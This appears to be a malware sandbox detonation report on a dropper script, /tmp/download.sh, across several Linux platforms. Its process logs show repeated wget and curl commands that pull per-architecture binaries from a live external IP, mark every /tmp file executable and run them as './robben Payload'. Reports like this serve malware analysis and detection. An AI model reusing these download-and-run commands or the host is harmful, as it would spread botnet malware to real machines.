2024-08-22 21:51

Platform

ubuntu2204-amd64-20240611-en

Max time kernel

270s

Max time network

276s

Command Line

[/tmp/download.sh]

Signatures

Executes dropped EXE

Description                  Indicator                      Process           Target
N/A                          /tmp/robben                    /tmp/robben       N/A
N/A                          /tmp/robben                    /tmp/robben       N/A
N/A                          /tmp/robben                    /tmp/robben       N/A
N/A                          /tmp/robben                    /tmp/robben       N/A
N/A                          /tmp/robben                    /tmp/robben       N/A
N/A                          /tmp/robben                    /tmp/robben       N/A
N/A                          /tmp/robben                    /tmp/robben       N/A
N/A                          /tmp/robben                    /tmp/robben       N/A
N/A                          /tmp/robben                    /tmp/robben       N/A
N/A                          /tmp/robben                    /tmp/robben       N/A
N/A                          /tmp/robben                    /tmp/robben       N/A

Writes file to tmp directory

Description                  Indicator                      Process           Target
File opened for modification /tmp/robben                    /tmp/download.sh  N/A

Processes

/tmp/download.sh

[/tmp/download.sh]

/usr/bin/wget

[wget http://158.51.127.106/bins/x86_64]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/x86_64]

/usr/bin/cat

[cat x86_64]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-YK1Avm robben snap-private-tmp systemd-private-4cce8c1d659a423cb3c1847a44125669-ModemManager.service-R1SWmc systemd-private-4cce8c1d659a423cb3c1847a44125669-colord.service-zvk1XA systemd-private-4cce8c1d659a423cb3c1847a44125669-power-profiles-daemon.service-BWr6Sc systemd-private-4cce8c1d659a423cb3c1847a44125669-switcheroo-control.service-IbHGa1 systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-logind.service-UVOyYH systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-oomd.service-MjMiKB systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-resolved.service-Ie9OFP systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-timedated.service-6CNoGb systemd-private-4cce8c1d659a423cb3c1847a44125669-upower.service-z3qcAU]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mips]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mips]

/usr/bin/cat

[cat mips]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-YK1Avm robben snap-private-tmp systemd-private-4cce8c1d659a423cb3c1847a44125669-ModemManager.service-R1SWmc systemd-private-4cce8c1d659a423cb3c1847a44125669-colord.service-zvk1XA systemd-private-4cce8c1d659a423cb3c1847a44125669-power-profiles-daemon.service-BWr6Sc systemd-private-4cce8c1d659a423cb3c1847a44125669-switcheroo-control.service-IbHGa1 systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-logind.service-UVOyYH systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-oomd.service-MjMiKB systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-resolved.service-Ie9OFP systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-timedated.service-6CNoGb systemd-private-4cce8c1d659a423cb3c1847a44125669-upower.service-z3qcAU]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mipsel]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mipsel]

/usr/bin/cat

[cat mipsel]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-YK1Avm robben snap-private-tmp systemd-private-4cce8c1d659a423cb3c1847a44125669-ModemManager.service-R1SWmc systemd-private-4cce8c1d659a423cb3c1847a44125669-colord.service-zvk1XA systemd-private-4cce8c1d659a423cb3c1847a44125669-power-profiles-daemon.service-BWr6Sc systemd-private-4cce8c1d659a423cb3c1847a44125669-switcheroo-control.service-IbHGa1 systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-logind.service-UVOyYH systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-oomd.service-MjMiKB systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-resolved.service-Ie9OFP systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-timedated.service-6CNoGb systemd-private-4cce8c1d659a423cb3c1847a44125669-upower.service-z3qcAU]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm]

/usr/bin/cat

[cat arm]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-YK1Avm robben snap-private-tmp systemd-private-4cce8c1d659a423cb3c1847a44125669-ModemManager.service-R1SWmc systemd-private-4cce8c1d659a423cb3c1847a44125669-colord.service-zvk1XA systemd-private-4cce8c1d659a423cb3c1847a44125669-power-profiles-daemon.service-BWr6Sc systemd-private-4cce8c1d659a423cb3c1847a44125669-switcheroo-control.service-IbHGa1 systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-logind.service-UVOyYH systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-oomd.service-MjMiKB systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-resolved.service-Ie9OFP systemd-private-4cce8c1d659a423cb3c1847a44125669-upower.service-z3qcAU]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm5]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm5]

/usr/bin/cat

[cat arm5]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-YK1Avm robben snap-private-tmp systemd-private-4cce8c1d659a423cb3c1847a44125669-ModemManager.service-R1SWmc systemd-private-4cce8c1d659a423cb3c1847a44125669-colord.service-zvk1XA systemd-private-4cce8c1d659a423cb3c1847a44125669-power-profiles-daemon.service-BWr6Sc systemd-private-4cce8c1d659a423cb3c1847a44125669-switcheroo-control.service-IbHGa1 systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-logind.service-UVOyYH systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-oomd.service-MjMiKB systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-resolved.service-Ie9OFP systemd-private-4cce8c1d659a423cb3c1847a44125669-upower.service-z3qcAU]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm6]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm6]

/usr/bin/cat

[cat arm6]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-YK1Avm robben snap-private-tmp systemd-private-4cce8c1d659a423cb3c1847a44125669-ModemManager.service-R1SWmc systemd-private-4cce8c1d659a423cb3c1847a44125669-colord.service-zvk1XA systemd-private-4cce8c1d659a423cb3c1847a44125669-power-profiles-daemon.service-BWr6Sc systemd-private-4cce8c1d659a423cb3c1847a44125669-switcheroo-control.service-IbHGa1 systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-logind.service-UVOyYH systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-oomd.service-MjMiKB systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-resolved.service-Ie9OFP systemd-private-4cce8c1d659a423cb3c1847a44125669-upower.service-z3qcAU]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm7]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm7]

/usr/bin/cat

[cat arm7]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-YK1Avm robben snap-private-tmp systemd-private-4cce8c1d659a423cb3c1847a44125669-ModemManager.service-R1SWmc systemd-private-4cce8c1d659a423cb3c1847a44125669-colord.service-zvk1XA systemd-private-4cce8c1d659a423cb3c1847a44125669-power-profiles-daemon.service-BWr6Sc systemd-private-4cce8c1d659a423cb3c1847a44125669-switcheroo-control.service-IbHGa1 systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-logind.service-UVOyYH systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-oomd.service-MjMiKB systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-resolved.service-Ie9OFP systemd-private-4cce8c1d659a423cb3c1847a44125669-upower.service-z3qcAU]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/spc]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/spc]

/usr/bin/cat

[cat spc]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-YK1Avm robben snap-private-tmp systemd-private-4cce8c1d659a423cb3c1847a44125669-ModemManager.service-R1SWmc systemd-private-4cce8c1d659a423cb3c1847a44125669-colord.service-zvk1XA systemd-private-4cce8c1d659a423cb3c1847a44125669-power-profiles-daemon.service-BWr6Sc systemd-private-4cce8c1d659a423cb3c1847a44125669-switcheroo-control.service-IbHGa1 systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-logind.service-UVOyYH systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-oomd.service-MjMiKB systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-resolved.service-Ie9OFP systemd-private-4cce8c1d659a423cb3c1847a44125669-upower.service-z3qcAU]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/sh4]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/sh4]

/usr/bin/cat

[cat sh4]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-YK1Avm robben snap-private-tmp systemd-private-4cce8c1d659a423cb3c1847a44125669-ModemManager.service-R1SWmc systemd-private-4cce8c1d659a423cb3c1847a44125669-colord.service-zvk1XA systemd-private-4cce8c1d659a423cb3c1847a44125669-power-profiles-daemon.service-BWr6Sc systemd-private-4cce8c1d659a423cb3c1847a44125669-switcheroo-control.service-IbHGa1 systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-logind.service-UVOyYH systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-oomd.service-MjMiKB systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-resolved.service-Ie9OFP systemd-private-4cce8c1d659a423cb3c1847a44125669-upower.service-z3qcAU]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/i586]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i586]

/usr/bin/cat

[cat i586]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-YK1Avm robben snap-private-tmp systemd-private-4cce8c1d659a423cb3c1847a44125669-ModemManager.service-R1SWmc systemd-private-4cce8c1d659a423cb3c1847a44125669-colord.service-zvk1XA systemd-private-4cce8c1d659a423cb3c1847a44125669-power-profiles-daemon.service-BWr6Sc systemd-private-4cce8c1d659a423cb3c1847a44125669-switcheroo-control.service-IbHGa1 systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-logind.service-UVOyYH systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-oomd.service-MjMiKB systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-resolved.service-Ie9OFP systemd-private-4cce8c1d659a423cb3c1847a44125669-upower.service-z3qcAU]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/i686]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i686]

/usr/bin/cat

[cat i686]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-YK1Avm robben snap-private-tmp systemd-private-4cce8c1d659a423cb3c1847a44125669-ModemManager.service-R1SWmc systemd-private-4cce8c1d659a423cb3c1847a44125669-colord.service-zvk1XA systemd-private-4cce8c1d659a423cb3c1847a44125669-power-profiles-daemon.service-BWr6Sc systemd-private-4cce8c1d659a423cb3c1847a44125669-switcheroo-control.service-IbHGa1 systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-logind.service-UVOyYH systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-oomd.service-MjMiKB systemd-private-4cce8c1d659a423cb3c1847a44125669-systemd-resolved.service-Ie9OFP systemd-private-4cce8c1d659a423cb3c1847a44125669-upower.service-z3qcAU]

/tmp/robben

[./robben Payload]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 N/A udp
US 158.51.127.106:80 N/A tcp
US 158.51.127.106:80 N/A tcp
US 158.51.127.106:80 N/A tcp
US 158.51.127.106:80 N/A tcp
US 158.51.127.106:80 N/A tcp
US 158.51.127.106:80 N/A tcp
US 158.51.127.106:80 N/A tcp
US 158.51.127.106:80 N/A tcp
US 158.51.127.106:80 N/A tcp
US 158.51.127.106:80 N/A tcp
US 158.51.127.106:80 N/A tcp
US 158.51.127.106:80 N/A tcp
US 158.51.127.106:80 N/A tcp
US 158.51.127.106:80 N/A tcp
US 158.51.127.106:80 N/A tcp
US 158.51.127.106:80 N/A tcp
US 158.51.127.106:80 N/A tcp
US 158.51.127.106:80 N/A tcp
US 158.51.127.106:80 N/A tcp
US 158.51.127.106:80 N/A tcp
US 158.51.127.106:80 N/A tcp
US 158.51.127.106:80 N/A tcp

Files

N/A

Analysis: behavioral9

Detonation Overview

Submitted

2024-08-22 21:45

Reported

2024-08-22 21:51

Platform

ubuntu2404-amd64-20240523-en

Max time kernel

182s

Max time network

183s

Command Line

[/tmp/download.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/download.sh N/A

Processes

/tmp/download.sh

[/tmp/download.sh]

/usr/bin/wget

[wget http://158.51.127.106/bins/x86_64]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/x86_64]

/usr/bin/cat

[cat x86_64]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-aXVSI4 gdm3-config-err-bMd6tX robben snap-private-tmp systemd-private-6f0e27d6d290440fa510126fb1a151b8-ModemManager.service-fFduJi systemd-private-6f0e27d6d290440fa510126fb1a151b8-colord.service-1z3hB5 systemd-private-6f0e27d6d290440fa510126fb1a151b8-polkit.service-YNLDeh systemd-private-6f0e27d6d290440fa510126fb1a151b8-power-profiles-daemon.service-LudAoO systemd-private-6f0e27d6d290440fa510126fb1a151b8-switcheroo-control.service-L8HLtl systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-logind.service-SYrG4e systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-oomd.service-ugagQG systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-resolved.service-XJcrLF systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-timedated.service-niFsCP systemd-private-6f0e27d6d290440fa510126fb1a151b8-upower.service-3WYcVD]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mips]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mips]

/usr/bin/cat

[cat mips]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-aXVSI4 gdm3-config-err-bMd6tX robben snap-private-tmp systemd-private-6f0e27d6d290440fa510126fb1a151b8-ModemManager.service-fFduJi systemd-private-6f0e27d6d290440fa510126fb1a151b8-colord.service-1z3hB5 systemd-private-6f0e27d6d290440fa510126fb1a151b8-polkit.service-YNLDeh systemd-private-6f0e27d6d290440fa510126fb1a151b8-power-profiles-daemon.service-LudAoO systemd-private-6f0e27d6d290440fa510126fb1a151b8-switcheroo-control.service-L8HLtl systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-logind.service-SYrG4e systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-oomd.service-ugagQG systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-resolved.service-XJcrLF systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-timedated.service-niFsCP systemd-private-6f0e27d6d290440fa510126fb1a151b8-upower.service-3WYcVD]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mipsel]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mipsel]

/usr/bin/cat

[cat mipsel]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-aXVSI4 gdm3-config-err-bMd6tX robben snap-private-tmp systemd-private-6f0e27d6d290440fa510126fb1a151b8-ModemManager.service-fFduJi systemd-private-6f0e27d6d290440fa510126fb1a151b8-colord.service-1z3hB5 systemd-private-6f0e27d6d290440fa510126fb1a151b8-polkit.service-YNLDeh systemd-private-6f0e27d6d290440fa510126fb1a151b8-power-profiles-daemon.service-LudAoO systemd-private-6f0e27d6d290440fa510126fb1a151b8-switcheroo-control.service-L8HLtl systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-logind.service-SYrG4e systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-oomd.service-ugagQG systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-resolved.service-XJcrLF systemd-private-6f0e27d6d290440fa510126fb1a151b8-upower.service-3WYcVD]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm]

/usr/bin/cat

[cat arm]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-aXVSI4 gdm3-config-err-bMd6tX robben snap-private-tmp systemd-private-6f0e27d6d290440fa510126fb1a151b8-ModemManager.service-fFduJi systemd-private-6f0e27d6d290440fa510126fb1a151b8-colord.service-1z3hB5 systemd-private-6f0e27d6d290440fa510126fb1a151b8-polkit.service-YNLDeh systemd-private-6f0e27d6d290440fa510126fb1a151b8-power-profiles-daemon.service-LudAoO systemd-private-6f0e27d6d290440fa510126fb1a151b8-switcheroo-control.service-L8HLtl systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-logind.service-SYrG4e systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-oomd.service-ugagQG systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-resolved.service-XJcrLF systemd-private-6f0e27d6d290440fa510126fb1a151b8-upower.service-3WYcVD]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm5]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm5]

/usr/bin/cat

[cat arm5]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-aXVSI4 gdm3-config-err-bMd6tX robben snap-private-tmp systemd-private-6f0e27d6d290440fa510126fb1a151b8-ModemManager.service-fFduJi systemd-private-6f0e27d6d290440fa510126fb1a151b8-colord.service-1z3hB5 systemd-private-6f0e27d6d290440fa510126fb1a151b8-polkit.service-YNLDeh systemd-private-6f0e27d6d290440fa510126fb1a151b8-power-profiles-daemon.service-LudAoO systemd-private-6f0e27d6d290440fa510126fb1a151b8-switcheroo-control.service-L8HLtl systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-logind.service-SYrG4e systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-oomd.service-ugagQG systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-resolved.service-XJcrLF systemd-private-6f0e27d6d290440fa510126fb1a151b8-upower.service-3WYcVD]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm6]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm6]

/usr/bin/cat

[cat arm6]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-aXVSI4 gdm3-config-err-bMd6tX robben snap-private-tmp systemd-private-6f0e27d6d290440fa510126fb1a151b8-ModemManager.service-fFduJi systemd-private-6f0e27d6d290440fa510126fb1a151b8-colord.service-1z3hB5 systemd-private-6f0e27d6d290440fa510126fb1a151b8-polkit.service-YNLDeh systemd-private-6f0e27d6d290440fa510126fb1a151b8-power-profiles-daemon.service-LudAoO systemd-private-6f0e27d6d290440fa510126fb1a151b8-switcheroo-control.service-L8HLtl systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-logind.service-SYrG4e systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-oomd.service-ugagQG systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-resolved.service-XJcrLF systemd-private-6f0e27d6d290440fa510126fb1a151b8-upower.service-3WYcVD]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm7]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm7]

/usr/bin/cat

[cat arm7]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-aXVSI4 gdm3-config-err-bMd6tX robben snap-private-tmp systemd-private-6f0e27d6d290440fa510126fb1a151b8-ModemManager.service-fFduJi systemd-private-6f0e27d6d290440fa510126fb1a151b8-colord.service-1z3hB5 systemd-private-6f0e27d6d290440fa510126fb1a151b8-polkit.service-YNLDeh systemd-private-6f0e27d6d290440fa510126fb1a151b8-power-profiles-daemon.service-LudAoO systemd-private-6f0e27d6d290440fa510126fb1a151b8-switcheroo-control.service-L8HLtl systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-logind.service-SYrG4e systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-oomd.service-ugagQG systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-resolved.service-XJcrLF systemd-private-6f0e27d6d290440fa510126fb1a151b8-upower.service-3WYcVD]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/spc]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/spc]

/usr/bin/cat

[cat spc]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-aXVSI4 gdm3-config-err-bMd6tX robben snap-private-tmp systemd-private-6f0e27d6d290440fa510126fb1a151b8-ModemManager.service-fFduJi systemd-private-6f0e27d6d290440fa510126fb1a151b8-colord.service-1z3hB5 systemd-private-6f0e27d6d290440fa510126fb1a151b8-polkit.service-YNLDeh systemd-private-6f0e27d6d290440fa510126fb1a151b8-power-profiles-daemon.service-LudAoO systemd-private-6f0e27d6d290440fa510126fb1a151b8-switcheroo-control.service-L8HLtl systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-logind.service-SYrG4e systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-oomd.service-ugagQG systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-resolved.service-XJcrLF systemd-private-6f0e27d6d290440fa510126fb1a151b8-upower.service-3WYcVD]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/sh4]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/sh4]

/usr/bin/cat

[cat sh4]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-aXVSI4 gdm3-config-err-bMd6tX robben snap-private-tmp systemd-private-6f0e27d6d290440fa510126fb1a151b8-ModemManager.service-fFduJi systemd-private-6f0e27d6d290440fa510126fb1a151b8-colord.service-1z3hB5 systemd-private-6f0e27d6d290440fa510126fb1a151b8-polkit.service-YNLDeh systemd-private-6f0e27d6d290440fa510126fb1a151b8-power-profiles-daemon.service-LudAoO systemd-private-6f0e27d6d290440fa510126fb1a151b8-switcheroo-control.service-L8HLtl systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-logind.service-SYrG4e systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-oomd.service-ugagQG systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-resolved.service-XJcrLF systemd-private-6f0e27d6d290440fa510126fb1a151b8-upower.service-3WYcVD]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/i586]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i586]

/usr/bin/cat

[cat i586]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-aXVSI4 gdm3-config-err-bMd6tX robben snap-private-tmp systemd-private-6f0e27d6d290440fa510126fb1a151b8-ModemManager.service-fFduJi systemd-private-6f0e27d6d290440fa510126fb1a151b8-colord.service-1z3hB5 systemd-private-6f0e27d6d290440fa510126fb1a151b8-polkit.service-YNLDeh systemd-private-6f0e27d6d290440fa510126fb1a151b8-power-profiles-daemon.service-LudAoO systemd-private-6f0e27d6d290440fa510126fb1a151b8-switcheroo-control.service-L8HLtl systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-logind.service-SYrG4e systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-oomd.service-ugagQG systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-resolved.service-XJcrLF systemd-private-6f0e27d6d290440fa510126fb1a151b8-upower.service-3WYcVD]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/i686]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i686]

/usr/bin/cat

[cat i686]

/usr/bin/chmod

[chmod +x download.sh gdm3-config-err-aXVSI4 gdm3-config-err-bMd6tX robben snap-private-tmp systemd-private-6f0e27d6d290440fa510126fb1a151b8-ModemManager.service-fFduJi systemd-private-6f0e27d6d290440fa510126fb1a151b8-colord.service-1z3hB5 systemd-private-6f0e27d6d290440fa510126fb1a151b8-polkit.service-YNLDeh systemd-private-6f0e27d6d290440fa510126fb1a151b8-power-profiles-daemon.service-LudAoO systemd-private-6f0e27d6d290440fa510126fb1a151b8-switcheroo-control.service-L8HLtl systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-logind.service-SYrG4e systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-oomd.service-ugagQG systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-resolved.service-XJcrLF systemd-private-6f0e27d6d290440fa510126fb1a151b8-systemd-timedated.service-QQoRad systemd-private-6f0e27d6d290440fa510126fb1a151b8-upower.service-3WYcVD]

/tmp/robben

[./robben Payload]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 N/A udp
US 158.51.127.106:80 N/A tcp
US 158.51.127.106:80 N/A tcp
US 158.51.127.106:80 N/A tcp
US 158.51.127.106:80 N/A tcp
US 158.51.127.106:80 N/A tcp
US 158.51.127.106:80 N/A tcp
US 158.51.127.106:80 N/A tcp
US 158.51.127.106:80 N/A tcp
US 158.51.127.106:80 N/A tcp
US 158.51.127.106:80 N/A tcp
US 158.51.127.106:80 N/A tcp
US 158.51.127.106:80 N/A tcp
US 158.51.127.106:80 N/A tcp
US 158.51.127.106:80 N/A tcp
US 158.51.127.106:80 N/A tcp
US 158.51.127.106:80 N/A tcp
US 158.51.127.106:80 N/A tcp
US 158.51.127.106:80 N/A tcp
US 158.51.127.106:80 N/A tcp
US 158.51.127.106:80 N/A tcp
US 158.51.127.106:80 N/A tcp
US 158.51.127.106:80 N/A tcp
US 8.8.8.8:53 api.snapcraft.io udp
US 8.8.8.8:53 api.snapcraft.io udp
GB 185.125.188.58:443 api.snapcraft.io tcp
US 8.8.8.8:53 api.snapcraft.io udp
GB 185.125.188.54:443 api.snapcraft.io tcp

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-08-22 21:45

Reported

2024-08-22 21:51

Platform

debian9-mipsbe-20240611-en

Max time kernel

182s

Max time network

253s

Command Line

[/tmp/download.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/download.sh N/A

Processes

/tmp/download.sh

[/tmp/download.sh]

/usr/bin/wget

[wget http://158.51.127.106/bins/x86_64]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/x86_64]

/bin/cat

[cat x86_64]

/bin/chmod

[chmod +x download.sh robben systemd-private-a081f6d4a0c548d19a522f73bcbdff25-systemd-timedated.service-GOfuOq]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mips]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mips]

/bin/cat

[cat mips]

/bin/chmod

[chmod +x download.sh robben systemd-private-a081f6d4a0c548d19a522f73bcbdff25-systemd-timedated.service-GOfuOq]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mipsel]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mipsel]

/bin/cat

[cat mipsel]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm]

/bin/cat

[cat arm]

/bin/chmod

[chmod +x download.sh robben]

